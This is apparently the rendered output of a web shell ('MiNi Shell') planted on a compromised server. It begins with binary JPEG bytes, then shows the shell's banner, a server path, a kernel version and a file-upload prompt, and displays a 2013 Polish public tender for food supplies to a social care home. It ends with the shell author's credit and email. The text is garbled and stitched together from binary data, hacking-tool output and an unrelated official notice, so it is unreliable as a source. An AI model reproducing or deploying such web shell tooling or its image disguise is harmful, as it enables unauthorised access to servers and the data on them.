JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130722/286308-N-2013.html

<p class="kh_header"><b>Bielawy: Dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 286308 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Borówek" im. Krystyny Bochenek , Borówek 56, 99-423 Bielawy, woj. łódzkie, tel. 46 8392114, faks 46 8392114.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Cukier op. 1kg-kg 2700, 2. Mąka pszenna Szymanowska lub równoważna, op. 1 kg kg 1300, 3. Mąka ziemniaczana op.1kg -kg 30, 4. Sól warzona, jodowana, spożywcza op. 1kg-kg 400, 5. Kasza jęczmienna wiejska, średnia, Select Horea  lub równoważna op. 5 kg -kg 264, 6. Kasza gryczana op. 1-10 kg-kg 68, 7. Kasza manna płońska Polskie Młyny lub równoważna op. 1 kg-kg 146, 8. Ryż biały długoziarnisty, Aro lub równoważny, op. 1 kg-kg 369, 9. Pieprz ziołowy Aro lub równoważny, op. 30 -kg 0,5, 10. Pierz mielony czarny naturalny prawdziwy Aro lub równoważny, op. 30g- kg 7, 11. Pieprz czarny ziarnisty, cały, Select Horea lub równoważny, op.16 g-kg 1,4, 12. Kwasek cytrynowy Aro lub równoważny, op. 20 g-kg 1, 13. Liść laurowy Aro lub równoważny op.7g-kg 0,5, 14. Majeranek otarty, Aro lub równoważny op.120 g-kg 4, 15. Przyprawa do potraw Aro lub równoważna, op 1 kg-kg 80, 16. Przyprawa magii Knorr lub równoważna op. 200 g-l 70, 17. Barszcz biały w płynie, Kuchnia Polska lub równoważny, op. 480 ml-l 60, 18. Rozpuszczalna kawa zbożowa Inka lub równoważna op. 150 g-kg 35, 19.Groch połówki Aro lub równoważny, op. 5 kg-kg 40, 20. Fasola Jaś średni, Select Horea lub równoważny, op. 5 kg-kg 200, 21. Ocet spirytusowy 10%- op 0,5 -1 l -l	60, 22. Olej uniwersalny Aro lub równoważny, op.1- 5 l-l 410, 23. Musztarda, sarepska, Aro lub równoważna, op 1-10 kg-kg 150, 24. Syrop owocowy o smaku malinowym, Herbapol lub równoważny, op. 2,85 l-l 170, 25. Makaron kolanka, świderki, nitki, Aro lub równoważny, op. 2,5 kg-kg  1100, 26. Wafelki kakaowe w czekoladzie, Aro lub równoważne, op. 40 g-kg 40, 27. Herbata granulowana, Golden Tea lub równoważna, op. 80 g-kg 150, 28. Płatki kukurydziane Aro lub równoważne, op. 1 kg-kg 130, 29. Płatki owsiane zwykłe Halina lub równoważne, op.400 g-kg 190, 30. Płatki jęczmienne błyskawiczne Halina lub równoważne, op. 400 g-kg 170, 31. Groszek konserwowy Aro lub równoważny, op. 400 g netto-kg 120, 32.Kukurydza konserwowa Aro lub równoważna, op. 340 g netto-kg 35, 33. Chrzan tarty Aro lub równoważny, op. 170 g-kg 20, 34. Majonez Aro lub równoważny, op. 1-10 kg-kg  130, 35. Ketchup Aro lub równoważny, op. 1-10 kg.-	kg 150, 36. Ćwikła z chrzanem Rolnik lub równoważna, op. 350 g-kg 20, 37. Koncentrat pomidorowy Dawtona lub równoważny, op. 1 kg-kg 240, 38. Budyń czekoladowy, waniliowy, śmietankowy Aro lub równoważny, op. 40 g-kg 40, 39. Kisiel truskawkowy, wiśniowy Aro lub równoważny, op. 38 g-kg 40, 40. Proszek do pieczenia Aro lub równoważny, op. 30 g.-kg  3, 41. Herbatniki zwykłe typu Petit Buere aro lub równoważne, op. 100 g-kg 300, 42. Chrupki kukurydziane Aro lub równoważne op 80 g-	kg 150, 43. Czekolada mleczna Aro lub równoważna, op. 100 g -kg  20, 44. Kakao ciemne , typu Baraqe Biedronka lub równoważne, op. 200g netto-kg 30, 45. Cukier waniliowy Aro lub równoważny, op. 16 g- kg 1,4, 46. Papryka mielona op 100-500g, smak ostry, kolor czerwony, konsystencja sypka, Aro lub równoważna- kg 1, 47. Rodzynki Aro lub równoważne, op.100g-kg 7, 48. Konserwa turystyczna, stołowa, krakowska, Mispol lub równoważna, op. 400 g netto-kg 150, 49. Konserwa rybna - szprot w pomidorach, Aro lub równoważna, op. 170 g netto-kg 180, 50. Konserwa rybna w oleju- szprot, Aro lub równoważna, op. 170 g netto- kg 60,51. Paprykarz szczeciński Łosoś Ustka lub równoważny, op 310 g netto-kg 50, 52. Konserwa - pasztet drobiowy, Marko lub równoważny, op 290 g netto- kg 70, 53. Koncentrat owocowy - aronia, naturalny nie słodzony, bez konserwantów, op. 100g-	kg 70,54. Sok w proszku - czarna porzeczka, naturalny, nie słodzony, bez konserwantów, op. 100 g-kg 35, 55. Mak suchy niebieski-  kg 10, 56. Mix aromatów spożywczych na bazie spirytusu, Libella lub równoważny, op. 50 fiolek x 4,5 g-l1,50, 57. Ziele angielskie aro lub równoważne, op. 15 g-kg  1, 58. Żelatyna Aro lub równoważna, op. 45 g -kg 3,     59. Cukier puder Aro lub równoważny, op. 0,5 kg-kg 4,5, 60. Margaryna o   zmniejszonej zawartości tłuszczu 60 % Aro lub równoważna, op. 250 g-kg 210, Załącznik nr 3, Warzywa przetworzone - przetworzone owoce - kod CPV: 15331000-7 15332100-5,  1. Papryka konserwowa Łowicz lub równoważna, waga większa lub równa 660 g netto -kg 100, 2. Sałatka szwedzka Łowicz lub równoważna, waga , waga większa lub równa  880 g netto-kg 200, 3. Sałatka łowicka lub równoważna, waga , waga większa lub równa   450 g netto- kg 200, 4. Szczaw konserwowy Rolnik lub równoważny, waga  , waga większa lub równa  320 ml netto-kg 20, 5. Dżem z czarnej porzeczki, truskawkowy, wiśniowy, brzoskwiniowy, wieloowocowy niskosłodzony, Łowicz lub równoważny, waga, waga większa lub równa  1 kg netto-kg  610, 6. Powidła śliwkowe ( lub marmolada) Łowicz lub równoważne, waga , waga większa lub równa 110 g netto-kg 25, 7. Ogórek konserwowy Łowicz lub równoważny, waga , waga większa lub równa 475 g netto-kg 450, 8. Ogórek kiszony - beczka, waga , waga większa lub równa 75 kg netto-kg 800, 9. 	Kapusta kiszona - beczka, waga , waga większa lub równa   110 kg netto-kg 900, Załącznik nr 4, Jajka - kod CPV: 03142500-3, 1. Jajka kg 1000, Załącznik nr 5, Warzywa - kod CPV: 03220000-9, 1. Ziemniaki, kształtne, sortowane -kg 11200, 2. Marchew-kg 1200, 3. Pietruszka -kg	350, 4. 	Cebula-	kg 750, 5.Seler -kg 350, 6. Por -kg 150, 7. Buraczki czerwone kg 920, 8. Kapusta biała-kg 720, 9. Kapusta pekińska-kg 	100, 10. Kapusta brukselka-kg	50, 11. Pieczarki -kg  300, 12. Sałata- kg 60, 13. Rzodkiewka-kg 10, 14. 	Papryka -kg 60, 15. Kalafior -kg 150, 16. Koper-kg 10, 17. Czosnek-kg  8, 18. Ogórek zielony -	kg 1200, 19. Fasola-kg 150, 20. 	Pomidory-kg 800, Załącznik nr 6, Owoce - kod CPV: 03220000-9, 1. 	Jabłka-kg 4600, 2. Arbuzy sezonowo -kg  400, 3. Truskawki sezonowo- kg 100, 4. Rabarbar sezonowo-	kg 70, 5. Wiśnie sezonowo -kg.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.lowicz.pl Jednostki organizacyjne powiatu - Dom Pomocy Społecznej w Borówku<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Borówek, im. Krystyny Bochenek, Borówek 56, 99-423 Bielawy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2013 godzina 10:00, miejsce: Sekretariat Domu Pomocy Społecznej Borówek, im. Krystyny Bochenek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com